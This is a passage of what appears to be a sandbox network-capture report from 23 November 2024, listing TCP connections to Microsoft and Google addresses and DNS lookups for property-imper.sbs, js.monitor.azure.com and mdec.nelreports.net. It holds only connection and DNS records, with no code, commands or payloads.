                                                                                                                                                                          Nov 23, 2024 19:03:03.118571997 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.118648052 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:03.118762970 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:03.118772030 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.119057894 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:03.119075060 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.119128942 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:03.119245052 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:03.119254112 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.804023027 CET44350007142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.804162025 CET44350007142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:03.804223061 CET50007443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:03:04.443761110 CET50007443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:03:04.443784952 CET44350007142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.943677902 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.944427013 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:04.944448948 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.945329905 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:04.945337057 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.947432995 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.948014975 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:04.948035002 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:04.948652029 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:04.948657990 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.016164064 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.017352104 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.030452967 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.030488968 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.064758062 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.106010914 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.106025934 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.107110023 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.107146025 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.107871056 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.107877016 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.388664007 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.391596079 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.391657114 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.395864010 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.395889997 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.395904064 CET50031443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.395910978 CET4435003113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.406351089 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.406438112 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.406518936 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.407350063 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.407465935 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.407519102 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.407535076 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.407582998 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.407628059 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.409589052 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.409626961 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.409727097 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.409739971 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.409749031 CET50030443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.409754038 CET4435003013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.412215948 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.412261009 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.412420988 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.412568092 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.412581921 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.495982885 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.499131918 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.499197960 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.499236107 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.499236107 CET50029443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.499258041 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.499269962 CET4435002913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.501317978 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.501363039 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.501441956 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.501594067 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.501621962 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.501765013 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.504900932 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.504961967 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.504983902 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.505013943 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.505058050 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.505086899 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.505100965 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.505110025 CET50028443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.505115986 CET4435002813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.506797075 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.506820917 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.506882906 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.506997108 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.507011890 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.568989038 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.569350958 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.569375992 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.569816113 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:05.569827080 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.011904001 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.018846035 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.018929005 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.111246109 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.111308098 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.111356020 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.111378908 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.116123915 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.116161108 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:06.116225004 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.116545916 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:06.116555929 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.201725960 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.202415943 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.202497959 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.202914000 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.202928066 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.268424988 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.268842936 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.268868923 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.269232988 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.269242048 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.321680069 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.323539019 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.323577881 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.323939085 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.323951006 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.330929995 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.331235886 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.331252098 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.331610918 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.331615925 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.637098074 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.640039921 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.640170097 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.640285969 CET50033443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.640326023 CET4435003313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.643181086 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.643215895 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.643373966 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.643621922 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.643630028 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.709192991 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.712197065 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.712930918 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.712980032 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.712995052 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.713006020 CET50036443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.713011026 CET4435003613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.715228081 CET50039443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.715277910 CET4435003913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.715378046 CET50039443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.715531111 CET50039443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.715547085 CET4435003913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.774295092 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.774389982 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.774480104 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.774490118 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.774547100 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.774586916 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.774621964 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.774648905 CET50035443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.774665117 CET4435003513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.776623011 CET50040443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.776729107 CET4435004013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.776837111 CET50040443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.776922941 CET50040443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.776945114 CET4435004013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.790400982 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.794065952 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.794529915 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.794529915 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.794552088 CET50034443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.794569969 CET4435003413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.796577930 CET50041443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.796673059 CET4435004113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.796751022 CET50041443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.796885967 CET50041443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.796919107 CET4435004113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.905786037 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.906132936 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.906147957 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:07.906568050 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:07.906572104 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.565334082 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.568722010 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.568766117 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.568777084 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.568811893 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.572771072 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.572801113 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.572817087 CET50037443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.572825909 CET4435003713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.587685108 CET50042443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.587776899 CET4435004213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:08.588573933 CET50042443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.589178085 CET50042443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:08.589211941 CET4435004213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.493522882 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.494194984 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.494209051 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.494712114 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.494718075 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.741164923 CET4435003913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.741708994 CET50039443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.741739988 CET4435003913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.742162943 CET50039443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.742167950 CET4435003913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.788419008 CET4435004013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.788817883 CET50040443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.788916111 CET4435004013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.789191961 CET50040443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.789211035 CET4435004013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.879934072 CET4435004113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.880476952 CET50041443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.880558968 CET4435004113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.880902052 CET50041443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.880917072 CET4435004113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.953977108 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.957053900 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.957103968 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.957139969 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.957153082 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.957163095 CET50038443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.957168102 CET4435003813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.959861994 CET50043443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.959932089 CET4435004313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:09.960016966 CET50043443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.960159063 CET50043443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:03:09.960187912 CET4435004313.107.246.63192.168.2.5
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Nov 23, 2024 19:01:04.220985889 CET4922153192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:04.490658998 CET53492211.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.172050953 CET53543131.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.286633968 CET53616541.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:51.345683098 CET53540151.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.313906908 CET6471253192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:52.314949036 CET6128753192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:52.457250118 CET53647121.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.459934950 CET53612871.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.654465914 CET6269253192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:54.654609919 CET5813153192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:58.020756006 CET5604553192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:01:58.021054983 CET5125253192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:02:03.705955982 CET53565581.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:05.099415064 CET6349153192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:02:05.099677086 CET5661753192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:02:08.239841938 CET53611981.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:27.289200068 CET53600011.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:47.831427097 CET53519241.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:49.675685883 CET53617851.1.1.1192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:03:05.132441998 CET5859953192.168.2.51.1.1.1
                                                                                                                                                                          Nov 23, 2024 19:03:05.136337042 CET5056653192.168.2.51.1.1.1
                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                          Nov 23, 2024 19:02:11.057430029 CET192.168.2.51.1.1.1c265(Port unreachable)Destination Unreachable
                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Nov 23, 2024 19:01:04.220985889 CET192.168.2.51.1.1.10x7cc5Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:52.313906908 CET192.168.2.51.1.1.10x9fd4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:52.314949036 CET192.168.2.51.1.1.10x6e2aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.654465914 CET192.168.2.51.1.1.10x595Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.654609919 CET192.168.2.51.1.1.10x2d50Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.020756006 CET192.168.2.51.1.1.10xf257Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.021054983 CET192.168.2.51.1.1.10x1aa9Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:05.099415064 CET192.168.2.51.1.1.10xeea6Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:05.099677086 CET192.168.2.51.1.1.10x70ecStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:03:05.132441998 CET192.168.2.51.1.1.10x80a9Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:03:05.136337042 CET192.168.2.51.1.1.10xc663Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Nov 23, 2024 19:01:04.490658998 CET1.1.1.1192.168.2.50x7cc5No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:04.490658998 CET1.1.1.1192.168.2.50x7cc5No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:52.457250118 CET1.1.1.1192.168.2.50x9fd4No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:52.459934950 CET1.1.1.1192.168.2.50x6e2aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.805823088 CET1.1.1.1192.168.2.50x2d50No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.805823088 CET1.1.1.1192.168.2.50x2d50No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.807909012 CET1.1.1.1192.168.2.50x595No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.807909012 CET1.1.1.1192.168.2.50x595No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.807909012 CET1.1.1.1192.168.2.50x595No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:54.807909012 CET1.1.1.1192.168.2.50x595No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:55.075829983 CET1.1.1.1192.168.2.50xaa33No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:55.195286989 CET1.1.1.1192.168.2.50xb1efNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:55.195286989 CET1.1.1.1192.168.2.50xb1efNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
